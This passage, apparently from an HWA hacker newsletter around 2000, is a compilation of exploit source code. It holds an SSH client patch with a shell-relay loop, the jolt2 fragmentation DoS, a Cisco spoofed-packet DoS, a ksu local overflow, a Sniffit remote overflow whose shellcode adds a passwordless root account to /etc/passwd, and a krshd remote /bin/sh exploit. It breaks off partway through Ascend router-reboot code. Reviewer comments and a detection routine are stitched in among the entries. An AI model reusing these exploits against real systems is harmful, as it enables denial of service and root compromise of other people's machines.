packet_write_wait();
+ #ifdef SSH_EXPLOIT
+ usleep(10);
+ first = 1;
+ i = write(packet_get_connection_in(),"id\n",3);
+ if ( getpeername(packet_get_connection_in(),(struct sockaddr *)&sin, &sin_len) == -1)
+ return;
+
+ while (1) {
+ FD_ZERO(&rfds);
+ FD_SET(packet_get_connection_in(),&rfds);
+ FD_SET(STDIN_FILENO,&rfds);
+ if ( (retval = select(packet_get_connection_in()+1,&rfds,NULL,NULL,NULL)) < 0 )
+ return;
+ if (FD_ISSET(STDIN_FILENO,&rfds)) {
+ i=read(STDIN_FILENO,buf,sizeof(buf));
+ write(packet_get_connection_out(),buf,i);
+ } else if (FD_ISSET(packet_get_connection_in(),&rfds)) {
+ i=read(packet_get_connection_in(),buf,sizeof(buf));
+ if ( first )
+ if ( strncmp(buf,"uid",3) )
+ return;
+ else {
+ fprintf(stdout,"Got it!\n");
+ first = 0;
+ }
+ write(STDOUT_FILENO,buf,i);
+ }
+ }
+ #endif
/* Destroy the session key integer and the public keys since we no longer
need them. */
mpz_clear(&key);
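Review bot: with SSH_EXPLOIT defined, the added while (1) loop can only be left through return, so the mpz_clear(&key) cleanup that follows the #endif is never reached and the key integer is left in memory. The nested "if ( first ) if ( strncmp(buf,"uid",3) ) return; else { ... }" also has no braces on the outer if, so which if the else belongs to is left to the compiler's dangling-else rule. Leave the loop with break so the existing cleanup still runs, and brace the outer if.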
***************
*** 1583,1588 ****
--- 1690,1697 ----
debug("Sent encrypted session key.");
/* Set the encryption key. */
+ packet_set_encryption_key(session_key, SSH_SESSION_KEY_LENGTH+120,
+ options->cipher, 1);
packet_set_encryption_key(session_key, SSH_SESSION_KEY_LENGTH,
options->cipher, 1);
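Review bot: the added packet_set_encryption_key(session_key, SSH_SESSION_KEY_LENGTH+120, ...) call is not wrapped in #ifdef SSH_EXPLOIT like the other additions in this patch, so it also changes a normal build of the client. It is followed directly by the original call with SSH_SESSION_KEY_LENGTH, which sets the key again, and if session_key holds only SSH_SESSION_KEY_LENGTH bytes the added call reads 120 bytes past the end of it. Drop the added call, or put it under the same #ifdef and document why the longer length is needed.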
Common subdirectories: ssh-1.2.27/zlib-1.0.4 and ssh-1.2.27-exploit/zlib-1.0.4
@HWA
240.0 [IND] '0-day' jolt2.c poc code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WinSec mailing list
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Here is some proof of concept code for the Jolt2 DoS reported by
BindView Razor Team (http://razor.bindview.com). Note, this code was
not created by me, I am simply passing it on to the mailing list.
Send all questions/problems to the author of the code,
phonix@moocow.org
Regards;
Steve Manzuik
Moderator
- --------------snip----------------
/*
* File: jolt2.c
* Author: Phonix <phonix@moocow.org>
* Date: 23-May-00
*
* Description: This is the proof-of-concept code for the
* Windows denial-of-service attack described by
* the Razor team (NTBugtraq, 19-May-00)
* (MS00-029). This code causes cpu utilization
* to go to 100%.
*
* Tested against: Win98; NT4/SP5,6; Win2K
*
* Written for: My Linux box. YMMV. Deal with it.
*
* Thanks: This is standard code. Ripped from lots of places.
* Insert your name here if you think you wrote some of
* it. It's a trivial exploit, so I won't take credit
* for anything except putting this file together.
*/
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <getopt.h>
struct _pkt
{
struct iphdr ip;
union {
struct icmphdr icmp;
struct udphdr udp;
} proto;
char data;
} pkt;
int icmplen = sizeof(struct icmphdr),
udplen = sizeof(struct udphdr),
iplen = sizeof(struct iphdr),
spf_sck;
void usage(char *pname)
{
fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n",
pname);
fprintf (stderr, "Note: UDP used if a port is specified, otherwise
ICMP\n");
exit(0);
}
u_long host_to_ip(char *host_name)
{
static u_long ip_bytes;
struct hostent *res;
res = gethostbyname(host_name);
if (res == NULL)
return (0);
memcpy(&ip_bytes, res->h_addr, res->h_length);
return (ip_bytes);
}
void quit(char *reason)
{
perror(reason);
close(spf_sck);
exit(-1);
}
int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
{
int bs, psize;
unsigned long x;
struct sockaddr_in to;
to.sin_family = AF_INET;
to.sin_port = 1235;
to.sin_addr.s_addr = dst_addr;
if (port)
psize = iplen + udplen + 1;
else
psize = iplen + icmplen + 1;
memset(&pkt, 0, psize);
pkt.ip.version = 4;
pkt.ip.ihl = 5;
pkt.ip.tot_len = htons(iplen + icmplen) + 40;
pkt.ip.id = htons(0x455);
pkt.ip.ttl = 255;
pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
pkt.ip.saddr = src_addr;
pkt.ip.daddr = dst_addr;
pkt.ip.frag_off = htons (8190);
if (port)
{
pkt.proto.udp.source = htons(port|1235);
pkt.proto.udp.dest = htons(port);
pkt.proto.udp.len = htons(9);
pkt.data = 'a';
} else {
pkt.proto.icmp.type = ICMP_ECHO;
pkt.proto.icmp.code = 0;
pkt.proto.icmp.checksum = 0;
}
while (1) {
bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to,
sizeof(struct sockaddr));
}
return bs;
}
int main(int argc, char *argv[])
{
u_long src_addr, dst_addr;
int i, bs=1, port=0;
char hostname[32];
if (argc < 2)
usage (argv[0]);
gethostname (hostname, 32);
src_addr = host_to_ip(hostname);
while ((i = getopt (argc, argv, "s:p:h")) != EOF)
{
switch (i)
{
case 's':
dst_addr = host_to_ip(optarg);
if (!dst_addr)
quit("Bad source address given.");
break;
case 'p':
port = atoi(optarg);
if ((port <=0) || (port > 65535))
quit ("Invalid port number given.");
break;
case 'h':
default:
usage (argv[0]);
}
}
dst_addr = host_to_ip(argv[argc-1]);
if (!dst_addr)
quit("Bad destination address given.");
spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (!spf_sck)
quit("socket()");
if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs,
sizeof(bs)) < 0)
quit("IP_HDRINCL");
do_frags (spf_sck, src_addr, dst_addr, port);
}
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
iQA/AwUBOS2ReDV9eGvIXwM6EQLOzgCgqF+8K+s95q7PXp6WE6HXFJVKXgMAn1ek
IAkI+Hv0ul66TxRmIJP1LqRH
=sSSM
-----END PGP SIGNATURE-----
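A detection-side view of the traffic pattern in the listing above, added here as an example and not part of the original post: a sensor classifier that flags a last fragment (MF clear, non-zero offset) arriving with no first fragment, and escalates when the identical one keeps repeating. The function names, the REPEAT_LIMIT threshold and the sample packet (built from the listing's id 0x455, TTL 255 and fragment-offset field 8190, with an assumed 29-byte total length) are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum frag_verdict {
    FRAG_NONE = 0,     /* unfragmented, or a fragment that looks normal */
    FRAG_MALFORMED,    /* header too short or lengths inconsistent */
    FRAG_OVERSIZE,     /* offset + payload would pass 65535 bytes */
    FRAG_ORPHAN_TAIL,  /* last fragment, first fragment never seen */
    FRAG_REPEAT_FLOOD  /* the same orphan tail seen REPEAT_LIMIT times */
};

#define SLOTS 32
#define REPEAT_LIMIT 8 /* assumed threshold; tune per sensor */
struct frag_slot {
    uint8_t addrs[8];  /* source and destination address bytes */
    uint16_t id, tail_off;
    uint8_t proto, used, seen_first;
    unsigned repeats;
};
struct frag_table { struct frag_slot slot[SLOTS]; unsigned next; };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Find the slot for this (src, dst, id, proto) datagram, or recycle one round-robin. */
static struct frag_slot *get_slot(struct frag_table *t, const uint8_t *pkt)
{
    struct frag_slot *s;
    for (unsigned i = 0; i < SLOTS; i++) {
        s = &t->slot[i];
        if (s->used && s->id == rd16(pkt + 4) && s->proto == pkt[9] &&
            memcmp(s->addrs, pkt + 12, 8) == 0)
            return s;
    }
    s = &t->slot[t->next];
    t->next = (t->next + 1) % SLOTS;
    memset(s, 0, sizeof(*s));
    s->used = 1; s->id = rd16(pkt + 4); s->proto = pkt[9];
    memcpy(s->addrs, pkt + 12, 8);
    return s;
}

/* Classify one captured IPv4 packet (the header checksum is not verified here). */
enum frag_verdict classify_fragment(struct frag_table *t, const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return FRAG_MALFORMED;
    size_t hlen = (size_t)(pkt[0] & 0x0f) * 4;
    size_t tot = rd16(pkt + 2);
    if (hlen < 20 || hlen > len || tot < hlen || tot > len)
        return FRAG_MALFORMED;
    uint16_t field = rd16(pkt + 6);
    int more = (field & 0x2000) != 0;   /* MF flag */
    uint16_t off = field & 0x1fff;      /* offset in 8-byte units */
    if (!more && off == 0)
        return FRAG_NONE;               /* not a fragment */
    if ((size_t)off * 8 + (tot - hlen) > 65535)
        return FRAG_OVERSIZE;
    struct frag_slot *s = get_slot(t, pkt);
    if (off == 0) {
        s->seen_first = 1;
        return FRAG_NONE;
    }
    if (more || s->seen_first)
        return FRAG_NONE;               /* middle piece, or tail of a known datagram */
    /* Tail with no first fragment: reordering can cause it once, a flood repeats it. */
    if (s->repeats > 0 && s->tail_off == off) {
        s->repeats++;
    } else {
        s->tail_off = off;
        s->repeats = 1;
    }
    return s->repeats >= REPEAT_LIMIT ? FRAG_REPEAT_FLOOD : FRAG_ORPHAN_TAIL;
}

/* Constructed test packet: 20-byte header, zeroed payload, documentation addresses. */
size_t make_packet(uint8_t *buf, uint16_t id, uint16_t frag_field, uint8_t proto, size_t payload)
{
    static const uint8_t addrs[8] = {192, 0, 2, 10, 198, 51, 100, 20};
    size_t tot = 20 + payload;
    memset(buf, 0, tot);
    buf[0] = 0x45; buf[8] = 255; buf[9] = proto;
    buf[2] = (uint8_t)(tot >> 8);        buf[3] = (uint8_t)tot;
    buf[4] = (uint8_t)(id >> 8);         buf[5] = (uint8_t)id;
    buf[6] = (uint8_t)(frag_field >> 8); buf[7] = (uint8_t)frag_field;
    memcpy(buf + 12, addrs, 8);
    return tot;
}

int main(void)
{
    static struct frag_table table;
    uint8_t pkt[64];
    size_t n = make_packet(pkt, 0x455, 8190, 1, 9); /* field values from the listing */
    for (int i = 1; i <= REPEAT_LIMIT; i++)
        printf("packet %d -> verdict %d\n", i, (int)classify_fragment(&table, pkt, n));
    return 0;
}
```

A single orphan tail is reported but not escalated, because ordinary reordering can deliver a last fragment before the first.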
@HWA
241.0 [IND] cisco remote dos attack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
#include <netdb.h>
unsigned short compute_tcp_checksum(struct tcphdr *th, int len,
unsigned long saddr, unsigned long daddr)
{
unsigned long sum;
__asm__("
addl %%ecx, %%ebx
adcl %%edx, %%ebx
adcl $0, %%ebx
"
: "=b"(sum)
: "0"(daddr), "c"(saddr), "d"((ntohs(len) << 16) + IPPROTO_TCP*256)
: "bx", "cx", "dx" );
__asm__("
movl %%ecx, %%edx
cld
cmpl $32, %%ecx
jb 2f
shrl $5, %%ecx
clc
1: lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
lodsl
adcl %%eax, %%ebx
loop 1b
adcl $0, %%ebx
movl %%edx, %%ecx
2: andl $28, %%ecx
je 4f
shrl $2, %%ecx
clc
3: lodsl
adcl %%eax, %%ebx
loop 3b
adcl $0, %%ebx
4: movl $0, %%eax
testw $2, %%dx
je 5f
lodsw
addl %%eax, %%ebx
adcl $0, %%ebx
movw $0, %%ax
5: test $1, %%edx
je 6f
lodsb
addl %%eax, %%ebx
adcl $0, %%ebx
6: movl %%ebx, %%eax
shrl $16, %%eax
addw %%ax, %%bx
adcw $0, %%bx
"
: "=b"(sum)
: "0"(sum), "c"(len), "S"(th)
: "ax", "bx", "cx", "dx", "si" );
return((~sum) & 0xffff);
}
#define psize ( sizeof(struct iphdr) + sizeof(struct tcphdr) )
#define tcp_offset ( sizeof(struct iphdr) )
#define err(x) { fprintf(stderr, x); exit(1); }
#define errors(x, y) { fprintf(stderr, x, y); exit(1); }
struct iphdr temp_ip;
int temp_socket = 0;
u_short
ip_checksum (u_short * buf, int nwords)
{
unsigned long sum;
for (sum = 0; nwords > 0; nwords--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
void
fixhost (struct sockaddr_in *addr, char *hostname)
{
struct sockaddr_in *address;
struct hostent *host;
address = (struct sockaddr_in *) addr;
(void) bzero ((char *) address, sizeof (struct sockaddr_in));
address->sin_family = AF_INET;
address->sin_addr.s_addr = inet_addr (hostname);
if ((int) address->sin_addr.s_addr == -1)
{
host = gethostbyname (hostname);
if (host)
{
bcopy (host->h_addr, (char *) &address->sin_addr,
host->h_length);
}
else
{
puts ("Couldn't resolve address!!!");
exit (-1);
}
}
}
unsigned int
lookup (host)
char *host;
{
unsigned int addr;
struct hostent *he;
addr = inet_addr (host);
if (addr == -1)
{
he = gethostbyname (host);
if ((he == NULL) || (he->h_name == NULL) || (he->h_addr_list == NULL))
return 0;
bcopy (*(he->h_addr_list), &(addr), sizeof (he->h_addr_list));
}
return (addr);
}
unsigned short
lookup_port (p)
char *p;
{
int i;
struct servent *s;
if ((i = atoi (p)) == 0)
{
if ((s = getservbyname (p, "tcp")) == NULL)
errors ("Unknown port %s\n", p);
i = ntohs (s->s_port);
}
return ((unsigned short) i);
}
void
spoof_packet (struct sockaddr_in local, int fromport, \
struct sockaddr_in remote, int toport, ulong sequence, \
int sock, u_char theflag, ulong acknum, \
char *packdata, int datalen)
{
char *packet;
int tempint;
if (datalen > 0)
datalen++;
packet = (char *) malloc (psize + datalen);
tempint = toport;
toport = fromport;
fromport = tempint;
{
struct tcphdr *fake_tcp;
fake_tcp = (struct tcphdr *) (packet + tcp_offset);
fake_tcp->th_dport = htons (fromport);
fake_tcp->th_sport = htons (toport);
fake_tcp->th_flags = theflag;
fake_tcp->th_seq = random ();
fake_tcp->th_ack = random ();
/* this is what really matters, however i randomize everything else
to prevent simple rule based filters */
fake_tcp->th_off = random ();
fake_tcp->th_win = random ();
fake_tcp->th_urp = random ();
}
if (datalen > 0)
{
char *tempbuf;
tempbuf = (char *) (packet + tcp_offset + sizeof (struct tcphdr));
for (tempint = 0; tempint < datalen - 1; tempint++)
{
*tempbuf = *packdata;
*tempbuf++;
*packdata++;
}
*tempbuf = '\r';
}
{
struct iphdr *real_ip;
real_ip = (struct iphdr *) packet;
real_ip->version = 4;
real_ip->ihl = 5;
real_ip->tot_len = htons (psize + datalen);
real_ip->tos = 0;
real_ip->ttl = 64;
real_ip->protocol = 6;
real_ip->check = 0;
real_ip->id = 10786;
real_ip->frag_off = 0;
bcopy ((char *) &local.sin_addr, &real_ip->daddr, sizeof (real_ip->daddr));
bcopy ((char *) &remote.sin_addr, &real_ip->saddr, sizeof (real_ip->saddr));
temp_ip.saddr = htonl (ntohl (real_ip->daddr));
real_ip->daddr = htonl (ntohl (real_ip->saddr));
real_ip->saddr = temp_ip.saddr;
real_ip->check = ip_checksum ((u_short *) packet, sizeof (struct iphdr) >> 1);
{
struct tcphdr *another_tcp;
another_tcp = (struct tcphdr *) (packet + tcp_offset);
another_tcp->th_sum = 0;
another_tcp->th_sum = compute_tcp_checksum (another_tcp, sizeof (struct tcphdr) + datalen,
real_ip->saddr, real_ip->daddr);
}
}
{
int result;
sock = (int) temp_socket;
result = sendto (sock, packet, psize + datalen, 0,
(struct sockaddr *) &remote, sizeof (remote));
}
free (packet);
}
void
main (argc, argv)
int argc;
char **argv;
{
unsigned int daddr;
unsigned short dport;
struct sockaddr_in sin;
int s, i;
struct sockaddr_in local, remote;
u_long start_seq = 4935835 + getpid ();
if (argc != 3)
errors ("Usage: %s <dest_addr> <dest_port>\n\nDest port of 23n",
argv[0]);
if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if ((temp_socket = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err ("Unable to open raw socket.\n");
if (!(daddr = lookup (argv[1])))
err ("Unable to lookup destination address.\n");
dport = lookup_port (argv[2]);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = daddr;
sin.sin_port = dport;
fixhost ((struct sockaddr_in *)(struct sockaddr *) &local, argv[1]);
fixhost ((struct sockaddr_in *)(struct sockaddr *) &remote, argv[1]);
/* 500 seems to be enough to kill it */
for (i = 0; i < 500; i++)
{
start_seq++;
local.sin_addr.s_addr = random ();
spoof_packet (local, random (), remote, dport, start_seq, (int) s,
TH_SYN | TH_RST | TH_ACK, 0, NULL, 0);
}
}
/* www.hack.co.za [22 May]*/
@HWA
242.0 [IND] linux local misc overflow by jim paris.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
jim@jtan.com
/********
* ksux.c -- ksu exploit
* written January 26, 2000
* Jim Paris <jim@jtan.com>
*
* This program exploits a vulnerability in the 'ksu' utility included
* with the MIT Kerberos distribution. Versions prior to 1.1.1 are
* vulnerable.
*
* This exploit is for Linux/x86 with Kerberos version 1.0. Exploits
* for other operating systems and versions of Kerberos should also work.
*
* Since krb5_parse_name will reject input with an @ or /, this shellcode
* execs 'sh' instead of '/bin/sh'. As a result, a copy of 'sh' must
* reside in the current directory for the exploit to work.
*
*/
#include <stdlib.h>
#include <stdio.h>
int get_esp(void) { __asm__("movl %esp,%eax"); }
char *shellcode="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x02\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xffsh";
#define LEN 0x300
#define RET_OFFSET 0x240
#define JMP_OFFSET 0x240
#define CODE_OFFSET 0x100
int main(int argc, char *argv[])
{
int esp=get_esp();
int i,j; char b[LEN];
memset(b,0x90,LEN);
memcpy(b+CODE_OFFSET,shellcode,strlen(shellcode));
*(int *)&b[RET_OFFSET]=esp+JMP_OFFSET;
b[RET_OFFSET+4]=0;
execlp("ksu","ksu","-n",b,NULL);
}
/* www.hack.co.za [22 May]*/
@HWA
243.0 [IND] linux remote misc overflow by noir.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
noir@gsu.linux.org.tr
/*
Sniffit 0.3.7Beta Remote Exploit
sniffit has to be running (-L mail) flag set for this to work.
bug discovery by http://www.s0ftpj.org
tested on RedHat 6.0
this will get you a root line in /etc/passwd
-->snip...
# tail -1 /etc/passwd
n0ir::0:0:mr. noir:/:/bin/sh
<--end...
greetz: gov-boi, CronoS, dustdvl, calaz, everyone at gsu-linux
exploit code by noir@gsu.linux.org.tr | noir@olympos.org
http://www.olympos.org
[RET]{NOP}[shellcode]
3 May 2000
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/time.h>
unsigned char shellcode[]= {
0xeb, 0x03, 0x5f, 0xeb, 0x05, 0xe8, 0xf8, 0xff,
0xff, 0xff, 0x31, 0xdb, 0xb3, 0x35, 0x01, 0xfb,
0x30, 0xe4, 0x88, 0x63, 0x0b, 0x31, 0xc9, 0x66,
0xb9, 0x01, 0x04, 0x31, 0xd2, 0x66, 0xba, 0xa4,
0x01, 0x31, 0xc0, 0xb0, 0x05, 0xcd, 0x80, 0x89,
0xc3, 0x31, 0xc9, 0xb1, 0x5b, 0x01, 0xf9, 0x31,
0xd2, 0xb2, 0x1d, 0x31, 0xc0, 0xb0, 0x04, 0xcd,
0x80, 0x31, 0xc0, 0xb0, 0x01, 0xcd, 0x80, 0x2f,
0x65, 0x74, 0x63, 0x2f, 0x70, 0x61, 0x73, 0x73,
0x77, 0x64, 0x01, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x6e, 0x30, 0x69, 0x72, 0x3a,
0x3a, 0x30, 0x3a, 0x30, 0x3a, 0x6d, 0x72, 0x2e,
0x20, 0x6e, 0x6f, 0x69, 0x72, 0x3a, 0x2f, 0x3a,
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20
};
int resolv(char *hname, struct in_addr *addr);
/*#define RET 0xaabbccdd marker lvalue*/
#define RET 0xbfff5ba3 /*RedHat 6.0 (hedwig)*/
#define NOP 0x90
int
main(int argc, char *argv[])
{
int fd;
int i, l;
int align = 11;
unsigned long eip = RET, addr = 0, offset = 0;
unsigned char ovf[812];
struct sockaddr_in servaddr;
if (argc < 2){
fprintf(stderr,"Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n");
fprintf(stderr,"Olympos Security Team http://www.olympos.org\n");
fprintf(stderr,"bug discovery by FuSyS of s0ftpj.org\n");
fprintf(stderr,"\nUsage: %s <serv> [offset]\n\n",argv[0]);
exit(0);
}
if( (fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0){
perror("socket");
exit(-1);
}
bzero(&servaddr, sizeof(servaddr));
servaddr.sin_family = AF_INET;
servaddr.sin_port = htons(25);
if(!resolv(argv[1], &servaddr.sin_addr)){
herror("gethostbyname");
exit(-1);
}
if(connect(fd, (struct sockaddr *) &servaddr, sizeof(servaddr)) < 0 ){
perror("connect");
exit(-1);
}
printf("Sniffit Version 0.3.7 Beta Linux/x86 remote exploit\nby noir@olympos.org | noir@gsu.linux.org.tr\n");
printf("Olympos Security Team http://www.olympos.org\n");
printf("bug discovery by FuSyS of s0ftpj.org\n");
if(argv[2])
offset = atoi(argv[2]);
addr = eip + offset;
memset(ovf, NOP, sizeof(ovf));
for( i = 0 ; i < align; i++) ovf[i] = 0x41;
for( i = align; i < strlen(ovf) ; i+=4)
*((long *) &ovf[i]) = addr;
for( i = 230; i < strlen(ovf); i++) ovf[i] = 0x90;
for( i = 603, l = 0; l < strlen(shellcode); i++, l++)
ovf[i] = shellcode[l];
printf("eip: 0x%lx\n", addr);
memcpy(ovf, "mail from:",10);
write(fd, ovf, strlen(ovf));
write(fd, "\r\n\n", 3);
return 0;
}
int
resolv(char *hname, struct in_addr *addr)
{
struct hostent *hp;
if(inet_aton(hname, addr))
return 1;
if ( (hp = gethostbyname(hname)) == NULL)
return 0;
memcpy((struct in_addr *)addr, (char *)hp->h_addr, sizeof(struct in_addr));
return 1;
}
/* www.hack.co.za [22 May]*/
@HWA
244.0 [IND] linux remote misc overflow by jim paris.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
jim@jtan.com
/********
* kshux.c -- krshd remote exploit
* written April 8, 2000
* Jim Paris <jim@jtan.com>
*
* This program exploits a vulnerability in the 'krshd' daemon included
* with the MIT Kerberos distribution. All versions are apparently
* vulnerable.
*
* This exploit is for Linux/x86 with Kerberos version 1.0, but you'll
* probably need a fair bit of coaxing to get it to work.
*
* And yes, it's ugly. I need to accept an incoming connection from the
* remote server, handle the fact that the overflow goes through two
* functions and a toupper(), make sure that certain overwritten pointers
* on the remote host's stack are set to valid values so that a strlen
* call in krb425_conv_principal() doesn't cause a segfault before we
* return into the shellcode, adjust the offset depending on the remote
* hostname to properly align things, etc etc. As a result, you'll
* probably have a hard time getting this to work -- it took a lot of
* hacking and hardcoded numbers to get this to work against my test
* systems.
*
*/
#include <stdio.h>
#include <sys/types.h>
#include <netdb.h>
#include <time.h>
#include <netinet/in.h>
#define LEN 1200
#define OFFSET 0
#define ADDR 0xbfffd7a4
char *sc="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
"\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
void get_incoming(int r) {
int s, l=1; struct sockaddr_in sa, ra;
bzero(&sa,sizeof(sa));
sa.sin_family=AF_INET;
sa.sin_addr.s_addr=htonl(INADDR_ANY);
sa.sin_port=htons(16474);
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
perror("socket"),exit(1);
setsockopt(s,SOL_SOCKET,SO_REUSEADDR,&l,sizeof(l));
if(bind(s,(struct sockaddr *)&sa,sizeof(sa))<0)
perror("bind"),exit(1);
if(listen(s,1))
perror("listen"),exit(1);
write(r,"16474",6);
if(accept(s,&sa,&l)<0)
perror("accept"),exit(1);
}
int con_outgoing(char *h) {
int s, i; struct sockaddr_in a; struct hostent *e;
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
perror("socket"),exit(1);
if((i=inet_addr(h))==INADDR_NONE) {
if((e=gethostbyname(h))==NULL)
perror("gethostbyname"),exit(1);
bcopy(e->h_addr,&i,sizeof(i)); }
bzero(&a,sizeof(a));
a.sin_family=AF_INET;
a.sin_addr.s_addr=i;
a.sin_port=htons(544);
if(connect(s,(struct sockaddr *)&a,sizeof(a))<0)
perror("connect"),exit(1);
return s;
}
void bus(int s) {
int i; fd_set r; char b[1024];
for(;;) {
FD_ZERO(&r); FD_SET(0,&r); FD_SET(s,&r);
if((i=select(s+1,&r,NULL,NULL,NULL))==-1)
perror("select"),exit(1);
if(i==0) fprintf(stderr,"closed\n"),exit(0);
if(FD_ISSET(s,&r)) {
if((i=read(s,b,sizeof(b)))<1)
fprintf(stderr,"closed\n"),exit(0);
write(1,b,i); }
if(FD_ISSET(0,&r)) {
if((i=read(0,b,sizeof(b)))<1)
fprintf(stderr,"closed\n"),exit(0);
write(s,b,i); } }
}
void main(int ac, char *av[])
{
int s, i, j, a=ADDR, o=OFFSET;
int l, h;
char b[LEN];
if(ac<2) {
fprintf(stderr,"%s hostname [addr] [offset]\n",*av);
exit(1);
}
a+=(ac>2)?atoi(av[2]):0;
o+=(ac>3)?atoi(av[3]):(4-(strlen(av[1])%4));
o%=4;
if(o<0) o+=4;
l=(ac>4)?atoi(av[4]):-10;
h=(ac>5)?atoi(av[5]):10;
fprintf(stderr,"addr=%p, offset=%d\n",a,o);
if(isupper(((char *)&a)[0]) ||
isupper(((char *)&a)[1]) ||
isupper(((char *)&a)[2]) ||
isupper(((char *)&a)[3]))
fprintf(stderr,"error: addr contains uppercase\n"),exit(0);
s=con_outgoing(av[1]);
get_incoming(s);
sprintf(&b[0],"AUTHV0.1blahblah");
*(int *)(b+16)=htonl(LEN);
b[20]=4; b[21]=7; b[22]=123;
write(s,b,23);
for(i=0;i<LEN-8-strlen(sc)-1;i++) b[i]=0x90;
bcopy(sc,b+i,strlen(sc)+1);
for(i=LEN-8;i<LEN;i++) b[i]=0x00;
for(i=255+o+l*4;i<=255+o+h*4;i+=4) *(int *)(b+i)=(a-4);
*(int *)(b+251+o)=a;
write(s,b,LEN);
bus(s);
}
/* www.hack.co.za [22 May]*/
@HWA
245.0 [IND] ascend remote dos attack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/* Update, 3/20/98: Ascend has released 5.0Ap46 which corrects this bug.
* see ftp.ascend.com.
*/
/*
* Ascend Kill II - C version
*
* Released: 3/16/98
*
* Thanks to Secure Networks. See SNI-26: Ascend Router Security Issues
* (http://www.secnet.com/sni-advisories/sni-26.ascendrouter.advisory.html)
*
* Sends a specially constructed UDP packet on the discard port (9)
* which causes Ascend routers to reboot. (Warning! Ascend routers will
* process these if they are broadcast packets.)
*
* Compiled under RedHat 5.0 with glibc.
*
* NOTE: This program is NOT to be used for malicious purposes. This is
* intended for educational purposes only. By using this program
* you agree to use this for lawful purposes ONLY.
*
* It is worth mentioning that Ascend has known about this bug for quite
* some time.
*
* Fix:
*
* Filter inbound UDP on port 9.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <linux/udp.h>
#include <netdb.h>
#define err(x) { fprintf(stderr, x); exit(1); }
#define errs(x, y) { fprintf(stderr, x, y); exit(1); }
/* This magic packet was taken from the Java Configurator */
char ascend_data[] =
{
0x00, 0x00, 0x07, 0xa2, 0x08, 0x12, 0xcc, 0xfd, 0xa4, 0x81, 0x00, 0x00,
0x00, 0x00, 0x12, 0x34, 0x56, 0x78, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x00, 0x4e, 0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0x4e,
0x41, 0x4d, 0x45, 0x4e, 0x41, 0x4d, 0x45, 0xff, 0x50, 0x41, 0x53, 0x53,
0x57, 0x4f, 0x52, 0x44, 0x50, 0x41, 0x53, 0x53, 0x57, 0x4f, 0x52, 0x44,
0x50, 0x41, 0x53, 0x53};
unsigned short
in_cksum (addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1)
{
